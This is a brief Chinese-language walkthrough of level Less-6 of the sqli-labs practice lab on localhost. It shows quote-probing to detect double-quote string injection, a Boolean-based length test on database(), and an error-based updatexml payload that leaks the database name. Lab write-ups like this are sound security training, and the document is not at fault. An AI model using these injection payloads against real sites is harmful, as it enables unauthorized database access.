sqli-labs (less-6)
输入
http://127.0.0.1/sql1/Less-6/?id=1 #回显正常
http://127.0.0.1/sql1/Less-6/?id=1' #回显正常
http://127.0.0.1/sql1/Less-6/?id=1" #回显错误
http://127.0.0.1/sql1/Less-6/?id=1"--+ #回显正常
根据id=1"回显的错误信息确定为字符型注入
这里因为也没有数据回显,所以也不能使用union注入
使用Boolean注入
判断当前数据库长度
http://127.0.0.1/sql1/Less-6/?id=1" and length(database())=8--+
具体过程请看我的less-5
使用报错注入攻击
http://127.0.0.1/sql1/Less-6/?id=1" and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
具体过程请看我的less-5